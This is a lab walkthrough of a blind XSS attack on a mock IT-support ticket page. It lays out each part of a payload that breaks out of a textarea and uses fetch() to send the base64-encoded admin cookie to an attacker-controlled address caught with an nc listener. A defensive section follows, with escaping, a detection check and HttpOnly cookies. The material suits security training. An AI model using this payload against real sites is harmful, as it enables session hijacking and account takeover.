Exploiting Blind XSS
Create an account
Once the account is set up, click the Support Tickets tab, which is the feature we will investigate for weaknesses.
Create a ticket and view the page source to see where our text lands in the application.
It sits inside a textarea tag (similar to our previous tasks), so close the textarea tag and then use script tags to execute an alert, just to confirm that the input is reflected!
And yes, it is. Our end goal is now to raise a malicious ticket that returns the admin's cookie when the admin views it!
The pieces of the payload, and what each one does:
</textarea> closes the textarea field
<script> opens an area for us to write JavaScript
fetch() makes an HTTP request
{URL_OR_IP} is our IP address or the Burp Collaborator link
?cookie= is the query string that will contain the victim's cookies
btoa() base64 encodes the victim's cookies
document.cookie accesses the victim's cookies for the Acme IT Support website
</script> closes the JavaScript code block
Start a listener using nc, or a web server using Python, to receive the victim's cookie in base64 format, then decode it and submit the flag!
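For the other side of the same bug, here is an added example (not code from the room or the Acme IT Support application) showing why the ticket text can escape the textarea, what the fix looks like, and a check a defender can run over rendered markup. The renderTicketUnsafe/renderTicketSafe functions, the "ticket" field name and the sample ticket body are assumptions constructed for the example.

```javascript
// Added example: the vulnerable render beside its hardened form, plus a check.
// The support-ticket page echoes the submitted text inside a <textarea>. When the
// body is concatenated straight into the markup, a closing tag in the text ends
// the field early and whatever follows is parsed as HTML (the bug exploited above).

// Escape the characters that can change meaning inside HTML text or attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable (assumed shape of the page): raw body placed inside the textarea.
function renderTicketUnsafe(body) {
  return '<textarea name="ticket">' + body + "</textarea>";
}

// Hardened: the body is escaped, so a "</textarea>" in the text is shown as text
// instead of closing the field, and no script tag is ever parsed as markup.
function renderTicketSafe(body) {
  return '<textarea name="ticket">' + escapeHtml(body) + "</textarea>";
}

// Defender's check on rendered markup: the browser ends a textarea at "</textarea"
// followed by whitespace, "/" or ">", so exactly one such sequence (the page's own)
// means the body stayed inside the field; any "<script" tag means it did not.
function escapesTextarea(html) {
  const closes = (html.match(/<\/textarea[\s\/>]/gi) || []).length;
  const hasScript = /<script[\s>]/i.test(html);
  return closes !== 1 || hasScript;
}

// Mitigation for the cookie theft itself: an HttpOnly session cookie is not
// readable through document.cookie even if a script does run. Cookie name assumed.
function sessionCookieHeader(value) {
  return "session=" + encodeURIComponent(value) + "; HttpOnly; Secure; SameSite=Lax";
}

// Constructed sample ticket body: the alert probe used above to test reflection.
const sampleBody = "</textarea><script>alert(1)</script>";
console.log("unsafe escapes field:", escapesTextarea(renderTicketUnsafe(sampleBody)));
console.log("safe escapes field:  ", escapesTextarea(renderTicketSafe(sampleBody)));
console.log(sessionCookieHeader("example-session-id"));
```

Run it with node; the unsafe render reports true and the escaped render reports false for the same ticket body.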